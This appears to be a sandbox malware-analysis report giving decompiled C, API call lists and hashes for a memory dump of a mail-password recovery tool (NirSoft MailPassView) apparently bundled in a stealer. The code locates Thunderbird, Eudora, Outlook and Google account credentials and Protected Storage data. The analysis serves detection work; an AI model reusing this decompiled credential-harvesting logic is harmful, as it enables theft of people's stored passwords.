                                                                                              0x004072ae
                                                                                              0x004072bc
                                                                                              0x004072c2
                                                                                              0x004072d5
                                                                                              0x004072dc
                                                                                              0x004072ea
                                                                                              0x004072f1
                                                                                              0x004072fc
                                                                                              0x0040730d
                                                                                              0x00407310
                                                                                              0x00407313
                                                                                              0x00407324
                                                                                              0x00407327
                                                                                              0x00407346
                                                                                              0x0040735b
                                                                                              0x00407369
                                                                                              0x00407373
                                                                                              0x00407378
                                                                                              0x0040737b
                                                                                              0x00407385
                                                                                              0x00407390
                                                                                              0x00407395
                                                                                              0x00407397
                                                                                              0x0040739d
                                                                                              0x004073a0
                                                                                              0x004073a6
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073b0
                                                                                              0x004073b3
                                                                                              0x004073bc
                                                                                              0x004073be
                                                                                              0x004073c5
                                                                                              0x004073c6
                                                                                              0x0040739d
                                                                                              0x004073ce
                                                                                              0x004073d0
                                                                                              0x004073d3
                                                                                              0x004073d9
                                                                                              0x004073df
                                                                                              0x004073df
                                                                                              0x004073e8
                                                                                              0x004073eb
                                                                                              0x004073f4
                                                                                              0x004073f6
                                                                                              0x004073f9
                                                                                              0x004073fa
                                                                                              0x004073d0
                                                                                              0x00407403

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004072AE
                                                                                              • memset.MSVCRT ref: 004072C2
                                                                                              • memset.MSVCRT ref: 004072DC
                                                                                              • memset.MSVCRT ref: 004072F1
                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                              • strlen.MSVCRT ref: 00407364
                                                                                              • strlen.MSVCRT ref: 00407373
                                                                                              • memcpy.MSVCRT ref: 00407385
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                              • API String ID: 1832431107-3760989150
                                                                                              • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                              • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                              • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                              • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406EC3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                                                              0x00406ec5
                                                                                              0x00406ec7
                                                                                              0x00406ecc
                                                                                              0x00406ef7
                                                                                              0x00406eff
                                                                                              0x00406f03
                                                                                              0x00000000
                                                                                              0x00406f05
                                                                                              0x00406f05
                                                                                              0x00000000
                                                                                              0x00406f05
                                                                                              0x00406ece
                                                                                              0x00406ed9
                                                                                              0x00406ee7
                                                                                              0x00406ee9
                                                                                              0x00406f0a
                                                                                              0x00406f0f
                                                                                              0x00406f11
                                                                                              0x00406f14
                                                                                              0x00406f1a
                                                                                              0x00406f20
                                                                                              0x00406f27
                                                                                              0x00406f3f
                                                                                              0x00406f4e
                                                                                              0x00406f41
                                                                                              0x00406f45
                                                                                              0x00406f4b
                                                                                              0x00406f53
                                                                                              0x00406f0f
                                                                                              0x00406f5a

                                                                                              APIs
                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                              • strlen.MSVCRT ref: 00406F27
                                                                                              • strlen.MSVCRT ref: 00406F2F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                              • String ID: rA
                                                                                              • API String ID: 379999529-474049127
                                                                                              • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                              • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                                                              • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                                                              • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E8B, Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 97%
                                                                                              			E00401E8B(void* __eflags, char* _a4) {
				signed int _v8;
				int _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void _v1059;
				char _v1060;
				void _v1323;
				char _v1324;
				void _v2347;
				char _v2348;
				void* __edi;
				void* __esi;
				int _t65;
				char* _t69;
				char _t70;
				int _t71;
				char _t75;
				void* _t76;
				long _t78;
				void* _t83;
				int _t85;
				void* _t87;
				int _t104;
				int _t108;
				char _t126;
				void* _t137;
				void* _t139;
				char* _t157;
				char* _t158;
				char* _t160;
				int _t161;
				void* _t164;
				CHAR* _t169;
				char* _t170;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;

				_v540 = 0;
				memset( &_v539, 0, 0x104);
				_t164 = 0x1a;
				E0040EE59( &_v540, _t164); // executed
				_t65 = strlen("Mozilla\\Profiles");
				_t6 = strlen( &_v540) + 1; // 0x1
				_t172 = _t171 + 0x14;
				if(_t65 + _t6 >= 0x104) {
					_t69 = _a4;
					 *_t69 = 0;
					_t157 = _t69;
				} else {
					_t157 = _a4;
					E004062AD(_t157,  &_v540, "Mozilla\\Profiles");
				}
				_t70 = E0040614B(_t157);
				if(_t70 == 0) {
					 *_t157 = _t70;
				}
				_t158 = _t157 + 0x105;
				_t71 = strlen("Thunderbird\\Profiles");
				_t12 = strlen( &_v540) + 1; // 0x1
				if(_t71 + _t12 >= 0x104) {
					 *_t158 = 0;
				} else {
					E004062AD(_t158,  &_v540, "Thunderbird\\Profiles");
				}
				_t75 = E0040614B(_t158);
				_pop(_t137);
				if(_t75 == 0) {
					 *_t158 = _t75;
				}
				_t160 = _a4 + 0x20a;
				_t76 = E00401C97(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
				_t173 = _t172 + 0xc;
				if(_t76 == 0) {
					_t126 = E00401C97(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x412466); // executed
					_t173 = _t173 + 0xc;
					if(_t126 == 0) {
						 *_t160 = _t126;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t78 = E0040EB3F(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
				_t174 = _t173 + 0xc;
				if(_t78 != 0) {
					L32:
					_t169 = _a4 + 0x30f;
					if( *_t169 != 0) {
						L35:
						return _t78;
					}
					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
					_t78 = E0040614B(_t169);
					if(_t78 != 0) {
						goto L35;
					}
					 *_t169 = _t78;
					return _t78;
				} else {
					_v796 = _t78;
					_t161 = 0;
					memset( &_v795, 0, 0xff);
					_v12 = 0;
					_t83 = E0040EC05(_v8, 0,  &_v796);
					_t175 = _t174 + 0x18;
					if(_t83 != 0) {
						L31:
						_t78 = RegCloseKey(_v8);
						goto L32;
					}
					_t170 = "sqlite3.dll";
					do {
						_t85 = atoi( &_v796);
						_pop(_t139);
						if(_t85 < 3) {
							goto L28;
						}
						_v2348 = 0;
						memset( &_v2347, _t161, 0x3ff);
						_v276 = 0;
						memset( &_v275, _t161, 0x104);
						sprintf( &_v2348, "%s\\Main",  &_v796);
						E0040EBC1(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
						_t175 = _t175 + 0x38;
						if(_v276 != 0 && E0040614B( &_v276) != 0) {
							_v1060 = 0;
							memset( &_v1059, _t161, 0x104);
							_v1324 = 0;
							memset( &_v1323, _t161, 0x104);
							_t104 = strlen(_t170);
							_t41 = strlen( &_v276) + 1; // 0x1
							_t175 = _t175 + 0x20;
							if(_t104 + _t41 >= 0x104) {
								_v1060 = 0;
							} else {
								E004062AD( &_v1060,  &_v276, _t170);
							}
							_t108 = strlen("nss3.dll");
							_t47 = strlen( &_v276) + 1; // 0x1
							if(_t108 + _t47 >= 0x104) {
								_v1324 = 0;
							} else {
								E004062AD( &_v1324,  &_v276, "nss3.dll");
							}
							if(E0040614B( &_v1060) == 0 || E0040614B( &_v1324) == 0) {
								_t161 = 0;
								goto L28;
							} else {
								strcpy(_a4 + 0x30f,  &_v276);
								goto L31;
							}
						}
						L28:
						_v12 = _v12 + 1;
						_t87 = E0040EC05(_v8, _v12,  &_v796);
						_t175 = _t175 + 0xc;
					} while (_t87 == 0);
					goto L31;
				}
			}














































                                                                                              0x00401ea6
                                                                                              0x00401ead
                                                                                              0x00401eb4
                                                                                              0x00401ebb
                                                                                              0x00401ec6
                                                                                              0x00401ed9
                                                                                              0x00401edd
                                                                                              0x00401ee2
                                                                                              0x00401efa
                                                                                              0x00401efd
                                                                                              0x00401f00
                                                                                              0x00401ee4
                                                                                              0x00401ee4
                                                                                              0x00401ef1
                                                                                              0x00401ef7
                                                                                              0x00401f03
                                                                                              0x00401f0b
                                                                                              0x00401f0d
                                                                                              0x00401f0d
                                                                                              0x00401f14
                                                                                              0x00401f1a
                                                                                              0x00401f2d
                                                                                              0x00401f35
                                                                                              0x00401f4e
                                                                                              0x00401f37
                                                                                              0x00401f45
                                                                                              0x00401f4b
                                                                                              0x00401f52
                                                                                              0x00401f59
                                                                                              0x00401f5a
                                                                                              0x00401f5c
                                                                                              0x00401f5c
                                                                                              0x00401f6b
                                                                                              0x00401f76
                                                                                              0x00401f7b
                                                                                              0x00401f85
                                                                                              0x00401f92
                                                                                              0x00401f97
                                                                                              0x00401f9c
                                                                                              0x00401f9e
                                                                                              0x00401f9e
                                                                                              0x00401f9c
                                                                                              0x00401fa0
                                                                                              0x00401fae
                                                                                              0x00401fb3
                                                                                              0x00401fb8
                                                                                              0x004021a9
                                                                                              0x004021ac
                                                                                              0x004021b5
                                                                                              0x004021d5
                                                                                              0x004021d5
                                                                                              0x004021d5
                                                                                              0x004021be
                                                                                              0x004021c5
                                                                                              0x004021cd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004021cf
                                                                                              0x00000000
                                                                                              0x00401fbe
                                                                                              0x00401fc3
                                                                                              0x00401fc9
                                                                                              0x00401fd3
                                                                                              0x00401fe3
                                                                                              0x00401fe6
                                                                                              0x00401feb
                                                                                              0x00401ff0
                                                                                              0x004021a0
                                                                                              0x004021a3
                                                                                              0x00000000
                                                                                              0x004021a3
                                                                                              0x00401ff6
                                                                                              0x00401ffb
                                                                                              0x00402002
                                                                                              0x0040200a
                                                                                              0x0040200b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040201e
                                                                                              0x00402025
                                                                                              0x00402033
                                                                                              0x0040203a
                                                                                              0x00402052
                                                                                              0x0040206e
                                                                                              0x00402073
                                                                                              0x0040207d
                                                                                              0x004020a1
                                                                                              0x004020a8
                                                                                              0x004020b6
                                                                                              0x004020bd
                                                                                              0x004020c3
                                                                                              0x004020d6
                                                                                              0x004020da
                                                                                              0x004020df
                                                                                              0x004020f8
                                                                                              0x004020e1
                                                                                              0x004020ef
                                                                                              0x004020f5
                                                                                              0x00402104
                                                                                              0x00402117
                                                                                              0x0040211f
                                                                                              0x0040213c
                                                                                              0x00402121
                                                                                              0x00402133
                                                                                              0x00402139
                                                                                              0x00402152
                                                                                              0x00402165
                                                                                              0x00000000
                                                                                              0x00402189
                                                                                              0x00402199
                                                                                              0x00000000
                                                                                              0x0040219f
                                                                                              0x00402152
                                                                                              0x00402167
                                                                                              0x00402167
                                                                                              0x00402177
                                                                                              0x0040217c
                                                                                              0x0040217f
                                                                                              0x00000000
                                                                                              0x00402187

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00401EAD
                                                                                              • strlen.MSVCRT ref: 00401EC6
                                                                                              • strlen.MSVCRT ref: 00401ED4
                                                                                              • strlen.MSVCRT ref: 00401F1A
                                                                                              • strlen.MSVCRT ref: 00401F28
                                                                                              • memset.MSVCRT ref: 00401FD3
                                                                                              • atoi.MSVCRT ref: 00402002
                                                                                              • memset.MSVCRT ref: 00402025
                                                                                              • sprintf.MSVCRT ref: 00402052
                                                                                                • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                              • memset.MSVCRT ref: 004020A8
                                                                                              • memset.MSVCRT ref: 004020BD
                                                                                              • strlen.MSVCRT ref: 004020C3
                                                                                              • strlen.MSVCRT ref: 004020D1
                                                                                              • strlen.MSVCRT ref: 00402104
                                                                                              • strlen.MSVCRT ref: 00402112
                                                                                              • memset.MSVCRT ref: 0040203A
                                                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                              • strcpy.MSVCRT(?,00000000), ref: 00402199
                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004021A3
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004021BE
                                                                                                • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 2492260235-4223776976
                                                                                              • Opcode ID: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                              • Instruction ID: fcae88f02dbfb35d0bd4b12665d2d891c1e7b320b053452542e36e55e3802549
                                                                                              • Opcode Fuzzy Hash: ac5e96ee30ae2dd9ced97f1bdc4fbeb635d430268e29e54df0797c77c4e8013e
                                                                                              • Instruction Fuzzy Hash: C891E472904158BADB21E765CC46FDA77AC9F44308F1004BBF609F2182EB789BD58B5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B9AD, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0040B9AD(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v604;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t68;
				void* _t72;
				int _t75;
				int _t77;
				struct HWND__* _t78;
				int _t80;
				int _t85;
				int _t86;
				struct HWND__* _t100;

				 *0x416b94 = _a4;
				_t49 = E00404837(__ecx);
				if(_t49 != 0) {
					E0040EDAC();
					_t52 = E00406A2C( &_v980);
					_t100 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B785(_t52,  &_v900);
					_v8 =  &_v980;
					E00406C87(__eflags,  &_v980, _a12);
					_t56 = E00406DFB(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E0040823D(); // executed
						_t58 = E00406DFB(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x417110 = 0x11223344; // executed
							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
							__eflags =  *0x417110 - 0x1c233487;
							if( *0x417110 == 0x1c233487) {
								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
								if(__eflags <= 0) {
									L13:
									__imp__CoInitialize(_t100);
									E0040B70A( &_v908);
									__eflags = _v604 - 3;
									if(_v604 != 3) {
										_push(5);
									} else {
										_push(3);
									}
									ShowWindow(_v644, ??);
									UpdateWindow(_v644);
									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
									E0040AD9D( &_v908);
									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
									__eflags = _t68;
									if(_t68 == 0) {
										L24:
										__imp__CoUninitialize();
										goto L25;
									} else {
										do {
											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
											__eflags = _t75;
											if(_t75 != 0) {
												goto L23;
											}
											_t78 =  *0x4171ac;
											__eflags = _t78 - _t100;
											if(_t78 == _t100) {
												L21:
												_t80 = IsDialogMessageA(_v644,  &_v936);
												__eflags = _t80;
												if(_t80 == 0) {
													TranslateMessage( &_v936);
													DispatchMessageA( &_v936);
												}
												goto L23;
											}
											_t85 = IsDialogMessageA(_t78,  &_v936);
											__eflags = _t85;
											if(_t85 != 0) {
												goto L23;
											}
											goto L21;
											L23:
											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
											__eflags = _t77;
										} while (_t77 != 0);
										goto L24;
									}
								}
								_t86 = E0040B8D7( &_v904, __eflags);
								__eflags = _t86;
								if(_t86 == 0) {
									_t100 = 0;
									__eflags = 0;
									goto L13;
								}
								_push(_v28);
								_v904 = 0x41356c;
								L004115D6();
								__eflags = _v304;
								if(_v304 != 0) {
									DeleteObject(_v304);
									_v308 = _v308 & 0x00000000;
								}
								goto L27;
							}
							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
							goto L25;
						}
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
						goto L25;
					} else {
						 *0x417488 = 0x416b28;
						E0040836E();
						L25:
						_push(_v32);
						_v908 = 0x41356c;
						L004115D6();
						__eflags = _v308 - _t100;
						if(_v308 != _t100) {
							DeleteObject(_v308);
							_v312 = _t100;
						}
						L27:
						_v908 = 0x412474;
						E00406A4E( &_v988);
						E0040462E( &_v956);
						E00406A4E( &_v988);
						_t72 = 0;
						__eflags = 0;
						goto L28;
					}
				} else {
					_t72 = _t49 + 1;
					L28:
					return _t72;
				}
			}








































                                                                                              0x0040b9bf
                                                                                              0x0040b9c4
                                                                                              0x0040b9cb
                                                                                              0x0040b9d3
                                                                                              0x0040b9dc
                                                                                              0x0040b9e1
                                                                                              0x0040b9e7
                                                                                              0x0040b9ef
                                                                                              0x0040b9f3
                                                                                              0x0040b9f7
                                                                                              0x0040b9fb
                                                                                              0x0040b9ff
                                                                                              0x0040ba0c
                                                                                              0x0040ba13
                                                                                              0x0040ba24
                                                                                              0x0040ba29
                                                                                              0x0040ba2b
                                                                                              0x0040ba41
                                                                                              0x0040ba52
                                                                                              0x0040ba57
                                                                                              0x0040ba59
                                                                                              0x0040ba7c
                                                                                              0x0040ba86
                                                                                              0x0040ba8c
                                                                                              0x0040ba96
                                                                                              0x0040bab7
                                                                                              0x0040babb
                                                                                              0x0040bb09
                                                                                              0x0040bb0a
                                                                                              0x0040bb14
                                                                                              0x0040bb19
                                                                                              0x0040bb21
                                                                                              0x0040bb27
                                                                                              0x0040bb23
                                                                                              0x0040bb23
                                                                                              0x0040bb23
                                                                                              0x0040bb30
                                                                                              0x0040bb3d
                                                                                              0x0040bb51
                                                                                              0x0040bb5c
                                                                                              0x0040bb6f
                                                                                              0x0040bb71
                                                                                              0x0040bb73
                                                                                              0x0040bbe3
                                                                                              0x0040bbe3
                                                                                              0x00000000
                                                                                              0x0040bb75
                                                                                              0x0040bb7b
                                                                                              0x0040bb8e
                                                                                              0x0040bb94
                                                                                              0x0040bb96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bb98
                                                                                              0x0040bb9d
                                                                                              0x0040bb9f
                                                                                              0x0040bbad
                                                                                              0x0040bbb9
                                                                                              0x0040bbbb
                                                                                              0x0040bbbd
                                                                                              0x0040bbc4
                                                                                              0x0040bbcf
                                                                                              0x0040bbcf
                                                                                              0x00000000
                                                                                              0x0040bbbd
                                                                                              0x0040bba7
                                                                                              0x0040bba9
                                                                                              0x0040bbab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040bbd5
                                                                                              0x0040bbdd
                                                                                              0x0040bbdf
                                                                                              0x0040bbdf
                                                                                              0x00000000
                                                                                              0x0040bb7b
                                                                                              0x0040bb73
                                                                                              0x0040bac1
                                                                                              0x0040bac6
                                                                                              0x0040bac8
                                                                                              0x0040bb07
                                                                                              0x0040bb07
                                                                                              0x00000000
                                                                                              0x0040bb07
                                                                                              0x0040baca
                                                                                              0x0040bad1
                                                                                              0x0040bad9
                                                                                              0x0040bade
                                                                                              0x0040bae7
                                                                                              0x0040baf4
                                                                                              0x0040bafa
                                                                                              0x0040bafa
                                                                                              0x00000000
                                                                                              0x0040bae7
                                                                                              0x0040baa5
                                                                                              0x00000000
                                                                                              0x0040baa5
                                                                                              0x0040ba65
                                                                                              0x00000000
                                                                                              0x0040ba2d
                                                                                              0x0040ba2d
                                                                                              0x0040ba37
                                                                                              0x0040bbe9
                                                                                              0x0040bbe9
                                                                                              0x0040bbf0
                                                                                              0x0040bbf8
                                                                                              0x0040bbfd
                                                                                              0x0040bc05
                                                                                              0x0040bc0e
                                                                                              0x0040bc14
                                                                                              0x0040bc14
                                                                                              0x0040bc1b
                                                                                              0x0040bc1f
                                                                                              0x0040bc27
                                                                                              0x0040bc30
                                                                                              0x0040bc39
                                                                                              0x0040bc3e
                                                                                              0x0040bc3e
                                                                                              0x00000000
                                                                                              0x0040bc3e
                                                                                              0x0040b9cd
                                                                                              0x0040b9cd
                                                                                              0x0040bc40
                                                                                              0x0040bc46
                                                                                              0x0040bc46

                                                                                              APIs
                                                                                                • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                                • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                                • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                                              • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                              • API String ID: 745651260-414181363
                                                                                              • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                              • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                              • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                              • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403C3D, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 170librarystringloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 65%
                                                                                              			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
				char _v8;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t38;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				void* _t60;
				char* _t73;
				void* _t76;
				_Unknown_base(*)()* _t86;
				void* _t87;
				void* _t89;
				signed int _t98;
				char* _t106;
				_Unknown_base(*)()* _t120;
				void* _t131;

				_t131 = __fp0;
				_t91 = __ecx;
				_push(__ecx);
				_t98 = __ecx;
				_t89 = __ecx + 0x87c;
				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
				E0040E894(_t89);
				_t38 = LoadLibraryA("pstorec.dll"); // executed
				 *(_t89 + 8) = _t38;
				if(_t38 == 0) {
					L4:
					E0040E894(_t89);
				} else {
					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
					_t120 = _t86;
					_t91 = 0 | _t120 != 0x00000000;
					 *(_t89 + 0x10) = _t86;
					if(_t120 != 0) {
						goto L4;
					} else {
						_t91 = _t89 + 4;
						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
						_t122 = _t87;
						if(_t87 != 0) {
							goto L4;
						} else {
							 *(_t89 + 0xc) = 1;
						}
					}
				}
				E004047A0(_t98 + 0x890, _t122);
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
				_push(_t98 + 0x858); // executed
				E0040754D(_t91, _t122); // executed
				E0040719C(_t91, _t98 + 0x86c); // executed
				E0040765B(_t122, _t98 + 0x878); // executed
				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
				_t123 = _t52;
				if(_t52 == 0) {
					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
				}
				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
				_t124 = _t54;
				if(_t54 == 0) {
					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
				}
				E00402C44(_t91, _t131, _t98); // executed
				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
				_t56 = E00406278();
				_push( &_v8);
				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
				} else {
					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
				}
				_push(0x80000001);
				_t58 = E0040EB3F();
				_t126 = _t58;
				if(_t58 != 0) {
					 *((char*)(_t98 + 0xa9c)) = 0;
				} else {
					E00402B09( &_v8, _t126, _t131, _t98);
				}
